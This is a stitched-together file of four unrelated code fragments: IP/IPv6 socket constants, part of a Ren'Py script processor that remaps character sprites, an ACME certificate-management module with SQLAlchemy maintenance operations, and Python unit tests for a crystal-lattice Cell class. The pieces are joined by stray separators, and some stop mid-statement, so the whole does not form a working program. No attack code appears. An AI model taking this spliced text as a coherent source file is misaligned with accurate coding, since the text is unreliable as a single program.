MCAST_BLOCK_SOURCE = 84
MCAST_UNBLOCK_SOURCE = 85
IP_DEFAULT_MULTICAST_TTL = 1
IP_DEFAULT_MULTICAST_LOOP = 1
IP_MIN_MEMBERSHIPS = 31
IP_MAX_MEMBERSHIPS = 4095
IP_MAX_SOURCE_FILTER = 1024
MCAST_UNDEFINED = 0
MCAST_INCLUDE = 1
MCAST_EXCLUDE = 2
IP_PORTRANGE_DEFAULT = 0
IP_PORTRANGE_HIGH = 1
IP_PORTRANGE_LOW = 2
IPCTL_FORWARDING = 1
IPCTL_SENDREDIRECTS = 2
IPCTL_DEFTTL = 3
IPCTL_DEFMTU = 4
IPCTL_RTEXPIRE = 5
IPCTL_RTMINEXPIRE = 6
IPCTL_RTMAXCACHE = 7
IPCTL_SOURCEROUTE = 8
IPCTL_DIRECTEDBROADCAST = 9
IPCTL_INTRQMAXLEN = 10
IPCTL_INTRQDROPS = 11
IPCTL_STATS = 12
IPCTL_ACCEPTSOURCEROUTE = 13
IPCTL_FASTFORWARDING = 14
IPCTL_KEEPFAITH = 15
IPCTL_GIF_TTL = 16
IPCTL_MAXID = 17
IPV6_SOCKOPT_RESERVED1 = 3
IPV6_UNICAST_HOPS = 4
IPV6_MULTICAST_IF = 9
IPV6_MULTICAST_HOPS = 10
IPV6_MULTICAST_LOOP = 11
IPV6_JOIN_GROUP = 12
IPV6_LEAVE_GROUP = 13
IPV6_PORTRANGE = 14
ICMP6_FILTER = 18
IPV6_CHECKSUM = 26
IPV6_V6ONLY = 27
IPV6_IPSEC_POLICY = 28
IPV6_FAITH = 29
IPV6_FW_ADD = 30
IPV6_FW_DEL = 31
IPV6_FW_FLUSH = 32
IPV6_FW_ZERO = 33
IPV6_FW_GET = 34
IPV6_RTHDRDSTOPTS = 35
IPV6_RECVPKTINFO = 36
IPV6_RECVHOPLIMIT = 37
IPV6_RECVRTHDR = 38
IPV6_RECVHOPOPTS = 39
IPV6_RECVDSTOPTS = 40
IPV6_USE_MIN_MTU = 42
IPV6_RECVPATHMTU = 43
IPV6_PATHMTU = 44
IPV6_PKTINFO = 46
IPV6_HOPLIMIT = 47
IPV6_NEXTHOP = 48
IPV6_HOPOPTS = 49
IPV6_DSTOPTS = 50
IPV6_RTHDR = 51
IPV6_RECVTCLASS = 57
IPV6_AUTOFLOWLABEL = 59
IPV6_TCLASS = | |
processBlockStep(rpFile, thread):
#type: (rpp.RenPyFile, rpp.RenPyThread) -> None
blk = thread.stack[-1];
i = blk.lineNum;
indent = blk.indent;
if (not(rpFile.indentIsGood(i, indent))):
thread.stack.pop();
return;
strippedLine = rpFile.lines[i].strip();
if (strippedLine.startswith("menu:")):
# Shift the block processor to the end of the menu, so that when the
# thread gets cloned it resumes from the right place
blk.lineNum = rpFile.blockEndLine(i + 1, indent + 4);
processMenuStep(rpFile, thread, i);
return;
elif (strippedLine.startswith("return")):
thread.stack = []; # Kill the thread
return;
elif (strippedLine.startswith("if ")):
thread.stack.append(rpp.RenPyIf(i, indent)); # Add an IF processor to the stack
i = rpFile.blockEndLine(i + 1, indent + 4);
elif (strippedLine.startswith("elif ") or strippedLine.startswith("else:")):
i = rpFile.blockEndLine(i + 1, indent + 4); # Flush it
elif (strippedLine.startswith("label goopy")):
# We hit the goopy path, no need to process this
thread.stack = []; # Kill the thread
return;
elif (strippedLine.startswith("hide")):
person = strippedLine.split()[1];
if rpFile.trackVis and not(person == "bg"):
thread.vars["_visible_" + person] = "0";
i += 1;
elif (strippedLine.startswith("jump")):
label = strippedLine.split()[1];
if not(label in rpFile.labelList):
print("External jump: " + label);
thread.stack = []; # Kill this thread, it jumped out of the file
return;
jumpDest = rpFile.labelList[label];
if (not((label == "kpathendroundup2") or label.startswith("endingclone")) or (jumpDest > blk.lineNum)):
addLabelCall(rpFile, label, thread);
thread.stack = []; # Kill this thread, it jumped
return;
else:
i = i + 1;
elif (strippedLine.startswith("show") or strippedLine.startswith("scene")):
if rpFile.trackVis and strippedLine.startswith("scene"):
for varName in thread.vars:
if varName.startswith("_visible_"):
thread.vars[varName] = "0";
if not(rpFile.lineModifiedFlags[i]):
rpFile.lines[i] = processShow(rpFile, thread, i);
rpFile.lineModifiedFlags[i] = True;
i = i + 1;
elif (strippedLine.startswith("$")):
processCommand(rpFile, thread, i, strippedLine.strip('$').strip());
i = i + 1;
else:
i = i + 1;
blk.lineNum = i;
#-----------------------------------------------------------------------------
# On entry, lineNum points to the menu: line
def processMenuStep(rpFile, thread, lineNum):
#type: (rpp.RenPyFile, rpp.RenPyThread, int) -> None
global threads;
indent = getIndentOf(rpFile.lines[lineNum]) + 4;
lineNum = lineNum + 1;
# Iterate the whole menu and fork threads from the current one for each
# menu option
line = rpFile.lines[lineNum];
while((lineNum < rpFile.numLines) and rpFile.indentIsGood(lineNum, indent)):
if (getIndentOf(line) == indent):
menuItem = line.strip('\n').strip('\r').strip();
if not((menuItem[0] == '#') or menuItem.startswith("\"{s}")):
endQuote = menuItem.find("\"", 1);
condition = ":";
if (endQuote > 0):
condition = menuItem[endQuote + 1:].strip();
res = True;
if (not(condition == ":")):
# Menu has a condition on it
condition = condition.strip(':');
res = calculateCondition(thread, lineNum, condition.split());
if (res):
newThread = copy.deepcopy(thread);
newThread.stack.append(rpp.RenPyBlock(lineNum + 1, indent + 4));
threads.append(newThread);
lineNum = rpFile.blockEndLine(lineNum + 1, indent + 4);
else:
lineNum = lineNum + 1;
else:
lineNum = lineNum + 1;
line = rpFile.lines[lineNum];
# Kill the current thread. Because it's been used as the parent thread for
# all the menu options, it's not needed any more as each menu option will
# continue from here.
thread.stack = [];
#-----------------------------------------------------------------------------
def processShow(rpFile, thread, lineNum):
#type: (rpp.RenPyFile, rpp.RenPyThread, int) -> str
line = rpFile.lines[lineNum];
fields = line.strip().strip(":").split();
# At this point, 'fields' looks like this:
# ['show', 'maind', '17', 'with', 'dissolve']
# Check for backgrounds
if fields[1] == "bg":
if len(fields) < 3:
return line;
if not(fields[2] in rpFile.backMap):
#return flagError(rpFile, lineNum, "Background " + fields[2] + " has no mapping table entry");
return line;
newLine = "";
indent = 0;
while line[indent] == " ":
newLine += " ";
indent = indent + 1;
newbg = rpFile.backMap[fields[2]];
if (newbg == ""):
return flagError(rpFile, lineNum, "Background '" + fields[2] + "' exists but has no mapping");
newLine += fields[0] + " bg " + newbg;
i = 3;
while i < len(fields):
newLine += " " + fields[i];
i = i + 1;
if (line.strip()[-1] == ":"):
newLine += ":";
newLine += "\n";
return newLine;
# Check for 0.3 style "show cg" statements
if (fields[0] == "show") and (fields[1] == "cg"):
return rpFile.processCG(line);
# Try for a character
# Character label is fields[1], get character name
if not(fields[0] == "show"):
return line;
if not(fields[1] in characterLabelMap):
return line;
if not(lineNum in rpFile.showLines):
rpFile.showLines.append(lineNum);
if (rpFile.trackVis):
varName = "_visible_" + fields[1];
if not(varName in thread.vars) or (thread.vars[varName] == "0"):
# Person has become visible
if (fields[1] in rpFile.charFlip) and not(lineNum in rpFile.visLines):
rpFile.visLines.append(lineNum);
thread.vars[varName] = "1";
# If it's got no parameters, like "show michelled:", then just return it
# as there's no mapping to do
if (len(fields) < 3):
return line;
charName = characterLabelMap[fields[1]];
swappedCharName = charName;
if characterDoRemap[fields[1]]:
# Character is not a ghost, do the remap
if (charName in personDispVars):
swappedCharName = thread.vars[personDispVars[charName]];
swappedFields = swappedCharName.split();
swappedCharName = swappedFields[0];
#i = 1;
#while i < len(swappedFields):
# fields.append(swappedFields[i]);
# i = i + 1;
filenameMode = True;
baseMode = True;
exFile = swappedCharName + "_ex";
modifiers = "";
base = "";
i = 2;
while i < len(fields):
if (fields[i] in ["as", "at", "behind", "with", "zorder"]):
filenameMode = False;
if (filenameMode):
field = expandNumberField(fields[i]);
if (field == "full"):
exFile = exFile + "_full";
elif isNumberField(field):
baseMode = False;
if baseMode:
if not(field == "full") and not((charName == "hillary") and (fields[i] == "school")):
base = base + " " + fields[i];
else:
exFile = exFile + "_" + field;
else:
modifiers = modifiers + " " + fields[i];
i = i + 1;
if (exFile == (swappedCharName + "_ex")):
# It's something like "show candice with dissolve", with no fields so nothing to do
return line;
mappedFile = "";
hasMapped = False;
if (swappedCharName in rpFile.charMap):
if exFile in rpFile.charMap[swappedCharName]:
mappedFile = rpFile.charMap[swappedCharName][exFile];
hasMapped = True;
elif exFile+"_001" in rpFile.charMap[swappedCharName]:
mappedFile = rpFile.charMap[swappedCharName][exFile+"_001"];
hasMapped = True;
elif exFile+"_002" in rpFile.charMap[swappedCharName]:
mappedFile = rpFile.charMap[swappedCharName][exFile+"_002"];
hasMapped = True;
elif exFile+"_003" in rpFile.charMap[swappedCharName]:
mappedFile = rpFile.charMap[swappedCharName][exFile+"_003"];
hasMapped = True;
else:
# We're not doing a V3 or V4 mapping for this character, fake that we've done one
mappedFile = exFile;
hasMapped = True;
if not(hasMapped):
# The .rpy file is referencing a graphic that doesn't seem to exist in the 0.4 graphics directory.
print("DBG: Vars are: " + str(thread.vars));
return(flagError(rpFile, lineNum, "Mapping failed, source file '" + exFile + "' not found. Line being processed is: " + str(fields)));
if mappedFile == "":
return(flagError(rpFile, lineNum, "Mapping failed, source file '" + exFile + "' exists but has no mapping. Line being processed is: " + str(fields)));
# Map V6 if present
if (swappedCharName in rpFile.v6Map):
hasMapped = False;
v6File = "";
if mappedFile in rpFile.v6Map[swappedCharName]:
v6File = rpFile.v6Map[swappedCharName][mappedFile];
hasMapped = True;
elif mappedFile+"_001" in rpFile.v6Map[swappedCharName]:
v6File = rpFile.v6Map[swappedCharName][mappedFile+"_001"];
hasMapped = True;
elif mappedFile+"_002" in rpFile.v6Map[swappedCharName]:
v6File = rpFile.v6Map[swappedCharName][mappedFile+"_002"];
hasMapped = True;
elif mappedFile+"_003" in rpFile.v6Map[swappedCharName]:
v6File = rpFile.v6Map[swappedCharName][mappedFile+"_003"];
hasMapped = True;
if not(hasMapped):
return(flagError(rpFile, lineNum, "No V6 mapping for V5 file '" + mappedFile + "', source file '" + exFile + "', char name " + swappedCharName + ", original char " + charName));
#print("Mapped V5 " + mappedFile + " to V6 " + v6File);
mappedFile = v6File;
mappedFields = mappedFile.split("_");
if (len(mappedFields) < 2):
return(flagError(rpFile, lineNum, "Invalid mapping! Source is '" + exFile + "', map is '" + mappedFile + "'"));
if not(mappedFields[0] == swappedCharName):
return(flagError(rpFile, lineNum, "Mapped to a different character! Source is '" + exFile + "', map is '" + mappedFile + "'"));
if not(mappedFields[1] == "ex"):
return(flagError(rpFile, lineNum, "Mapping is not to an expression graphic! Source is '" + exFile + "', map is '" + mappedFile + "'"));
newLine = "";
indent = 0;
while line[indent] == " ":
newLine += " ";
indent = indent + 1;
newLine += "show " + fields[1] + base;
i = 2;
while i < len(mappedFields) - 1:
if isNumberField(mappedFields[i]):
newLine += " " + str(int(mappedFields[i]));
else:
newLine += " " + mappedFields[i];
i = i + 1;
newLine += modifiers;
if (line.strip()[-1] == ":"):
newLine += ":";
newLine += "\n";
return newLine;
#-----------------------------------------------------------------------------
def processNextThread(rpFile):
#type: (rpp.RenPyFile) -> None
global threads;
thread = threads.pop();
while len(thread.stack) > 0:
obj = thread.stack[-1];
if (obj.objType == "Block"):
processBlockStep(rpFile, thread);
elif (obj.objType | |
# stdlib
import logging
# pypi
import requests
import sqlalchemy
# from zope.sqlalchemy import mark_changed
# localapp
from . import actions_acme
from . import getcreate
from . import update
from .logger import _log_object_event
from .logger import log__OperationsEvent
from .. import errors
from .. import events
from ... import lib
from ...model import objects as model_objects
from ...model import utils as model_utils
# from .logger import AcmeLogger
# ==============================================================================
log = logging.getLogger(__name__)
# ------------------------------------------------------------------------------
"""
TODO: sqlalchemy 1.4 rename
* ``isnot`` is now ``is_not``
* ``notin_`` is now ``not_in``
"""
_SA_VERSION = None # parsed version
_SA_1_4 = None # Boolean
def scalar_subquery(query):
global _SA_VERSION
global _SA_1_4
if _SA_VERSION is None:
_SA_VERSION = tuple(int(i) for i in sqlalchemy.__version__.split("."))
if _SA_VERSION >= (1, 4, 0):
_SA_1_4 = True
else:
_SA_1_4 = False
if _SA_1_4:
return query.scalar_subquery()
return query.subquery().as_scalar()
def operations_deactivate_expired(ctx):
"""
deactivates expired Certificates automatically
:param ctx: (required) A :class:`lib.utils.ApiContext` instance
"""
# create an event first
event_payload_dict = lib.utils.new_event_payload_dict()
event_payload_dict["count_deactivated"] = 0
operationsEvent = log__OperationsEvent(
ctx,
model_utils.OperationsEventType.from_string(
"CertificateSigned__deactivate_expired"
),
event_payload_dict,
)
# update the recents, this will automatically create a subevent
# this is required, because the following logic depends upon every
# Domain record being hinted with the id(s) of the latest corresponding
# Certificate(s)
subevent = operations_update_recents__global(ctx) # noqa: F841
# Start the Deactivate Logic
# placeholder
deactivated_cert_ids = []
# Step 1: load all the Expired Certificates
# order them by newest-first
expired_certs = (
ctx.dbSession.query(model_objects.CertificateSigned)
.filter(
model_objects.CertificateSigned.is_active.is_(True),
model_objects.CertificateSigned.timestamp_not_after < ctx.timestamp,
)
.order_by(model_objects.CertificateSigned.timestamp_not_after.desc())
.all()
)
# Step 2: Analyze
for cert in expired_certs:
# the domains for each Certificate require a query
# Certificate > [[UniqueFQDNSet > UniqueFQDNSet2Domain]] > Domain
cert_domains = (
ctx.dbSession.query(model_objects.Domain)
.join(
model_objects.UniqueFQDNSet2Domain,
model_objects.Domain.id == model_objects.UniqueFQDNSet2Domain.domain_id,
isouter=True,
)
.join(
model_objects.CertificateSigned,
model_objects.UniqueFQDNSet2Domain.unique_fqdn_set_id
== model_objects.CertificateSigned.unique_fqdn_set_id,
isouter=True,
)
.filter(
model_objects.CertificateSigned.id == cert.id,
)
.all()
)
cert_ok = True
for cert_domain in cert_domains:
# if this Certificate is the latest Certificate for the domain, we can not turn it off
if cert.id in (
cert_domain.certificate_signed_id__latest_single,
cert_domain.certificate_signed_id__latest_multi,
):
cert_ok = False
if cert_ok:
deactivated_cert_ids.append(cert.id)
cert.is_active = False
ctx.dbSession.flush(objects=[cert])
events.Certificate_expired(ctx, cert)
# update the event
if len(deactivated_cert_ids):
event_payload_dict["count_deactivated"] = len(deactivated_cert_ids)
event_payload_dict["certificate_signed.ids"] = deactivated_cert_ids
operationsEvent.set_event_payload(event_payload_dict)
ctx.dbSession.flush(objects=[operationsEvent])
return operationsEvent
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
_header_2_format = {
"application/pkcs7-mime": "pkcs7",
"application/pkix-cert": "pkix-cert",
}
def operations_reconcile_cas(ctx):
"""
tries to reconcile CAs
:param ctx: (required) A :class:`lib.utils.ApiContext` instance
"""
dbCertificateCAs = (
ctx.dbSession.query(model_objects.CertificateCA)
.filter(
model_objects.CertificateCA.cert_issuer_uri.isnot(None),
model_objects.CertificateCA.cert_issuer__reconciled.isnot(True),
)
.all()
)
_certificate_ca_ids = []
for dbCertificateCA in dbCertificateCAs:
log.debug("Reconciling CA...")
_certificate_ca_ids.append(dbCertificateCA.id)
cert_issuer_uri = dbCertificateCA.cert_issuer_uri
log.debug(dbCertificateCA.cert_subject)
log.debug(cert_issuer_uri)
resp = requests.get(cert_issuer_uri)
if resp.status_code != 200:
raise ValueError("Could not load certificate")
content_type = resp.headers.get("content-type")
filetype = _header_2_format.get(content_type) if content_type else None
cert_pems = None
if filetype == "pkcs7":
cert_pems = lib.cert_utils.convert_pkcs7_to_pems(resp.content)
elif filetype == "pkix-cert":
cert_pem = lib.cert_utils.convert_der_to_pem(resp.content)
cert_pems = [
cert_pem,
]
else:
raise ValueError("Not Implemented: %s" % content_type)
for cert_pem in cert_pems:
cert_parsed = lib.cert_utils.parse_cert(cert_pem)
(
_dbCertificateCAReconciled,
_is_created,
) = getcreate.getcreate__CertificateCA__by_pem_text(ctx, cert_pem)
# mark the first item as reconciled
dbCertificateCA.cert_issuer__reconciled = True
if not dbCertificateCA.cert_issuer__certificate_ca_id:
dbCertificateCA.cert_issuer__certificate_ca_id = (
_dbCertificateCAReconciled.id
)
else:
raise ValueError("Not Implemented: multiple reconciles")
# mark the second item
reconciled_uris = _dbCertificateCAReconciled.reconciled_uris
reconciled_uris = reconciled_uris.split(" ") if reconciled_uris else []
if cert_issuer_uri not in reconciled_uris:
reconciled_uris.append(cert_issuer_uri)
reconciled_uris = " ".join(reconciled_uris)
_dbCertificateCAReconciled.reconciled_uris = reconciled_uris
dbCertificateCAReconciliation = model_objects.CertificateCAReconciliation()
dbCertificateCAReconciliation.timestamp_operation = ctx.timestamp
dbCertificateCAReconciliation.certificate_ca_id = dbCertificateCA.id
dbCertificateCAReconciliation.certificate_ca_id__issuer__reconciled = (
_dbCertificateCAReconciled.id
)
dbCertificateCAReconciliation.result = True
ctx.dbSession.add(dbCertificateCAReconciliation)
event_payload_dict = lib.utils.new_event_payload_dict()
event_payload_dict["certificate_ca.ids"] = _certificate_ca_ids
dbOperationsEvent = log__OperationsEvent(
ctx,
model_utils.OperationsEventType.from_string("operations__reconcile_cas"),
event_payload_dict,
)
return dbOperationsEvent
def operations_update_recents__domains(ctx, dbDomains=None, dbUniqueFQDNSets=None):
"""
updates A SINGLE dbDomain record with recent values
:param ctx: (required) A :class:`lib.utils.ApiContext` instance
:param dbDomains: (required) A list of :class:`model.objects.Domain` instances
:param dbUniqueFQDNSets: (optional) A list of :class:`model.objects.UniqueFQDNSet` instances
"""
# we need a list of domain ids
_domain_ids = [i.id for i in dbDomains] if dbDomains else []
_unique_fqdn_set_ids = [i.id for i in dbUniqueFQDNSets] if dbUniqueFQDNSets else []
domain_ids = set(_domain_ids)
if dbUniqueFQDNSets:
for _dbUniqueFQDNSet in dbUniqueFQDNSets:
for _domain in _dbUniqueFQDNSet.domains:
domain_ids.add(_domain.id)
domain_ids = list(domain_ids)
if not domain_ids:
raise ValueError("no Domains specified")
#
# Step1:
# Update the cached `certificate_signed_id__latest_single` data for each Domain
_q_sub = (
ctx.dbSession.query(model_objects.CertificateSigned.id)
.join(
model_objects.UniqueFQDNSet2Domain,
model_objects.CertificateSigned.unique_fqdn_set_id
== model_objects.UniqueFQDNSet2Domain.unique_fqdn_set_id,
)
.filter(
model_objects.CertificateSigned.is_active.is_(True),
model_objects.CertificateSigned.is_single_domain_cert.is_(True),
model_objects.UniqueFQDNSet2Domain.domain_id == model_objects.Domain.id,
model_objects.Domain.id.in_(domain_ids),
)
.order_by(model_objects.CertificateSigned.timestamp_not_after.desc())
.limit(1)
)
_q_sub = scalar_subquery(_q_sub)
ctx.dbSession.execute(
model_objects.Domain.__table__.update()
.values(certificate_signed_id__latest_single=_q_sub)
.where(model_objects.Domain.__table__.c.id.in_(domain_ids))
)
#
# Step2:
# Update the cached `certificate_signed_id__latest_multi` data for each Domain
_q_sub = (
ctx.dbSession.query(model_objects.CertificateSigned.id)
.join(
model_objects.UniqueFQDNSet2Domain,
model_objects.CertificateSigned.unique_fqdn_set_id
== model_objects.UniqueFQDNSet2Domain.unique_fqdn_set_id,
)
.filter(
model_objects.CertificateSigned.is_active.is_(True),
model_objects.CertificateSigned.is_single_domain_cert.is_(False),
model_objects.UniqueFQDNSet2Domain.domain_id == model_objects.Domain.id,
model_objects.Domain.id.in_(domain_ids),
)
.order_by(model_objects.CertificateSigned.timestamp_not_after.desc())
.limit(1)
)
_q_sub = scalar_subquery(_q_sub)
ctx.dbSession.execute(
model_objects.Domain.__table__.update()
.values(certificate_signed_id__latest_multi=_q_sub)
.where(model_objects.Domain.__table__.c.id.in_(domain_ids))
)
# bookkeeping, doing this will mark the session as changed!
event_payload_dict = lib.utils.new_event_payload_dict()
event_payload_dict["domain.ids"] = _domain_ids
event_payload_dict["unique_fqdn_set.ids"] = _unique_fqdn_set_ids
dbOperationsEvent = log__OperationsEvent(
ctx,
model_utils.OperationsEventType.from_string(
"operations__update_recents__domains"
),
event_payload_dict,
)
return dbOperationsEvent
def operations_update_recents__global(ctx):
"""
updates all the objects to their most-recent relations
:param ctx: (required) A :class:`lib.utils.ApiContext` instance
"""
#
# Step1:
# Update the cached `certificate_signed_id__latest_single` data for each Domain
# _t_domain = model_objects.Domain.__table__.alias('domain')
_q_sub = (
ctx.dbSession.query(model_objects.CertificateSigned.id)
.join(
model_objects.UniqueFQDNSet2Domain,
model_objects.CertificateSigned.unique_fqdn_set_id
== model_objects.UniqueFQDNSet2Domain.unique_fqdn_set_id,
)
.filter(
model_objects.CertificateSigned.is_active.is_(True),
model_objects.CertificateSigned.is_single_domain_cert.is_(True),
model_objects.UniqueFQDNSet2Domain.domain_id == model_objects.Domain.id,
)
.order_by(model_objects.CertificateSigned.timestamp_not_after.desc())
.limit(1)
)
_q_sub = scalar_subquery(_q_sub)
ctx.dbSession.execute(
model_objects.Domain.__table__.update().values(
certificate_signed_id__latest_single=_q_sub
)
)
#
# Step2:
# Update the cached `certificate_signed_id__latest_multi` data for each Domain
# _t_domain = model_objects.Domain.__table__.alias('domain')
_q_sub = (
ctx.dbSession.query(model_objects.CertificateSigned.id)
.join(
model_objects.UniqueFQDNSet2Domain,
model_objects.CertificateSigned.unique_fqdn_set_id
== model_objects.UniqueFQDNSet2Domain.unique_fqdn_set_id,
)
.filter(
model_objects.CertificateSigned.is_active.is_(True),
model_objects.CertificateSigned.is_single_domain_cert.is_(False),
model_objects.UniqueFQDNSet2Domain.domain_id == model_objects.Domain.id,
)
.order_by(model_objects.CertificateSigned.timestamp_not_after.desc())
.limit(1)
)
_q_sub = scalar_subquery(_q_sub)
ctx.dbSession.execute(
model_objects.Domain.__table__.update().values(
certificate_signed_id__latest_multi=_q_sub
)
)
#
# Step3:
# update the count of active cert for each CertificateCA
CertificateSigned1 = sqlalchemy.orm.aliased(model_objects.CertificateSigned)
CertificateSigned2 = sqlalchemy.orm.aliased(model_objects.CertificateSigned)
CertificateSignedChain1 = sqlalchemy.orm.aliased(
model_objects.CertificateSignedChain
)
CertificateSignedChain2 = sqlalchemy.orm.aliased(
model_objects.CertificateSignedChain
)
CertificateCAChain1 = sqlalchemy.orm.aliased(model_objects.CertificateCAChain)
CertificateCAChain2 = sqlalchemy.orm.aliased(model_objects.CertificateCAChain)
_q_sub = (
ctx.dbSession.query(sqlalchemy.func.count(model_objects.Domain.id))
.outerjoin(
CertificateSigned1,
model_objects.Domain.certificate_signed_id__latest_single
== CertificateSigned1.id,
)
.outerjoin(
CertificateSigned2,
model_objects.Domain.certificate_signed_id__latest_multi
== CertificateSigned2.id,
)
.outerjoin(
CertificateSignedChain1,
CertificateSigned1.id == CertificateSignedChain1.certificate_signed_id,
)
.outerjoin(
CertificateSignedChain2,
CertificateSignedChain2.id == CertificateSignedChain2.certificate_signed_id,
)
.outerjoin(
CertificateCAChain1,
CertificateSignedChain1.certificate_ca_chain_id
== CertificateCAChain1.certificate_ca_0_id,
)
.outerjoin(
CertificateCAChain2,
CertificateSignedChain1.certificate_ca_chain_id
== CertificateCAChain2.certificate_ca_0_id,
)
.filter(
sqlalchemy.or_(
model_objects.CertificateCA.id
== CertificateCAChain1.certificate_ca_0_id,
model_objects.CertificateCA.id
== CertificateCAChain2.certificate_ca_0_id,
)
)
)
_q_sub = scalar_subquery(_q_sub)
ctx.dbSession.execute(
model_objects.CertificateCA.__table__.update().values(
count_active_certificates=_q_sub
)
)
#
# Step4:
# update the count of certificates/orders for each PrivateKey
# this is done automatically, but a periodic update is a good idea
# 4.A - PrivateKey.count_acme_orders
_q_sub = ctx.dbSession.query(
sqlalchemy.func.count(model_objects.AcmeOrder.private_key_id),
).filter(
model_objects.AcmeOrder.private_key_id == model_objects.PrivateKey.id,
)
_q_sub = scalar_subquery(_q_sub)
ctx.dbSession.execute(
model_objects.PrivateKey.__table__.update().values(count_acme_orders=_q_sub)
)
# 4.b - PrivateKey.count_certificate_signeds
_q_sub = ctx.dbSession.query(
sqlalchemy.func.count(model_objects.CertificateSigned.private_key_id),
).filter(
model_objects.CertificateSigned.private_key_id == model_objects.PrivateKey.id,
)
_q_sub = scalar_subquery(_q_sub)
ctx.dbSession.execute(
model_objects.PrivateKey.__table__.update().values(
count_certificate_signeds=_q_sub
)
)
#
# Step5:
# update the counts for each AcmeAccount
# 5.a - AcmeAccount.count_acme_orders
_q_sub = ctx.dbSession.query(
sqlalchemy.func.count(model_objects.AcmeOrder.acme_account_id),
).filter(
model_objects.AcmeOrder.acme_account_id == model_objects.AcmeAccount.id,
)
_q_sub = scalar_subquery(_q_sub)
ctx.dbSession.execute(
model_objects.AcmeAccount.__table__.update().values(count_acme_orders=_q_sub)
)
# 5.b - AcmeAccount.count_certificate_signeds
_q_sub = ctx.dbSession.query(
sqlalchemy.func.count(model_objects.AcmeOrder.certificate_signed_id),
).filter(
model_objects.AcmeOrder.acme_account_id == model_objects.AcmeAccount.id,
model_objects.AcmeOrder.certificate_signed_id.is_not(None),
)
_q_sub = scalar_subquery(_q_sub)
ctx.dbSession.execute(
model_objects.AcmeAccount.__table__.update().values(
count_certificate_signeds=_q_sub
)
)
# TODO: should we do the timestamps?
"""
UPDATE acme_account SET timestamp_last_certificate_request = (
SELECT MAX(timestamp_created) FROM certificate_request
WHERE certificate_request.acme_account_id = acme_account.id);
UPDATE acme_account SET timestamp_last_certificate_issue = (
SELECT MAX(timestamp_created) FROM certificate_signed
WHERE certificate_signed.acme_account_id = acme_account.id);
UPDATE private_key SET timestamp_last_certificate_request = (
SELECT MAX(timestamp_created) FROM certificate_request
WHERE certificate_request.private_key_id = private_key.id);
UPDATE private_key SET timestamp_last_certificate_issue = (
SELECT MAX(timestamp_created) FROM certificate_signed
WHERE certificate_signed.private_key_id = private_key.id);
"""
# bookkeeping, doing this will mark the session as changed!
dbOperationsEvent = log__OperationsEvent(
ctx,
model_utils.OperationsEventType.from_string(
"operations__update_recents__global"
),
)
return dbOperationsEvent
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def api_domains__enable(ctx, domain_names):
"""
this is just a proxy around queue_domains__add
:param ctx: (required) A :class:`lib.utils.ApiContext` instance
:param domain_names: (required) a list of domain names
"""
# bookkeeping
event_payload_dict = lib.utils.new_event_payload_dict()
dbOperationsEvent = log__OperationsEvent(
ctx,
model_utils.OperationsEventType.from_string("ApiDomains__enable"),
event_payload_dict,
)
results = lib.db.queues.queue_domains__add(ctx, domain_names)
return results
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - | |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import unittest as ut
import numpy as np
from mykit.core.cell import (Cell, CellError, atoms_from_sym_nat, axis_list,
periodic_duplicates_in_cell, sym_nat_from_atoms)
from mykit.core.constants import ANG2AU, AU2ANG, PI
from mykit.core.utils import get_dirpath, get_matched_files
class simple_cubic_lattice(ut.TestCase):
_a = 5.0
_latt = [[_a, 0.0, 0.0],
[0.0, _a, 0.0],
[0.0, 0.0, _a]]
_atoms = ["C"]
_frac = 0.5
_pos = [[_frac, 0.0, 0.0]]
_cell = Cell(_latt, _atoms, _pos, unit="ang", coordSys="D")
def test_properties(self):
# unit
self.assertEqual(self._cell.unit, "ang")
# coordinate system
self.assertEqual(self._cell.coordSys, "D")
# real space vectors
self.assertTrue(np.array_equal(self._cell.a, self._latt))
self.assertAlmostEqual(pow(self._a, 3), self._cell.vol)
self.assertTrue(np.array_equal(self._cell.center, [0.5, 0.5, 0.5]))
self.assertTupleEqual(self._cell.lattConsts,
(self._a, self._a, self._a, 90.0, 90.0, 90.0))
# Reciprocal
recpIn2Pi = np.array(self._latt, dtype=self._cell._dtype)/self._a**2
self.assertTrue(np.allclose(self._cell.bIn2Pi, recpIn2Pi))
self.assertTrue(np.allclose(self._cell.b, recpIn2Pi * 2.0 * PI))
self.assertTrue(np.allclose(self._cell.blen, (2.0*PI/self._a,)*3))
# atom types
self.assertEqual(1, self._cell.natoms)
self.assertListEqual(["C", ], self._cell.atomTypes)
self.assertDictEqual({0: "C"}, self._cell.typeMapping)
self.assertListEqual([0, ], self._cell.typeIndex)
def test_magic(self):
self.assertEqual(1, len(self._cell))
self.assertTupleEqual(tuple(self._pos[0]), tuple(self._cell[0]))
def test_coord_conv(self):
self.assertRaisesRegex(CellError,
"Only support \"D\" direct or fractional and \"C\" Cartisian coordinate.",
self._cell.__setattr__, "coordSys", 'unknown')
# direct2cart
self._cell.coordSys = 'C'
self.assertTupleEqual(
tuple(self._cell[0]), (self._frac * self._a, 0.0, 0.0))
self.assertEqual("C", self._cell.coordSys)
# cart2direct
self._cell.coordSys = 'D'
self.assertEqual(self._cell[0][0], self._frac)
self.assertEqual("D", self._cell.coordSys)
def test_unit_conv(self):
# ang2au
self._cell.unit = 'au'
_latt = self._cell.get_cell()[0]
if self._cell._dtype == 'float32':
self.assertAlmostEqual(_latt[0, 0], self._a * ANG2AU, places=5)
else:
self.assertAlmostEqual(_latt[0, 0], self._a * ANG2AU)
self._cell.coordSys = 'C'
# au2ang
self._cell.unit = 'ang'
self.assertAlmostEqual(self._a * self._frac, self._cell.pos[0, 0])
self._cell.coordSys = 'D'
_latt = self._cell.get_cell()[0]
self.assertEqual(_latt[0, 0], self._a)
def test_scale(self):
self.assertRaisesRegex(
CellError, "scale must be positive real", self._cell.scale, '2')
self.assertRaisesRegex(
CellError, "scale must be positive real", self._cell.scale, -2.0)
self._cell.scale(2)
self._cell.scale(0.5)
self.assertTrue(np.array_equal(self._cell.a, self._latt))
def test_spglib_input(self):
_ip = self._cell.get_spglib_input()
self.assertTupleEqual(
(self._cell.latt, self._cell.pos, self._cell.typeIndex), _ip)
class cell_raise(ut.TestCase):
def test_bad_cell(self):
_latt = [[5.0, 0.0, 0.0],
[0.0, 0.0, 5.0]]
_atoms = ["C"]
_pos = [[0.0, 0.0, 0.0]]
self.assertRaises(CellError, Cell, _latt, _atoms, _pos)
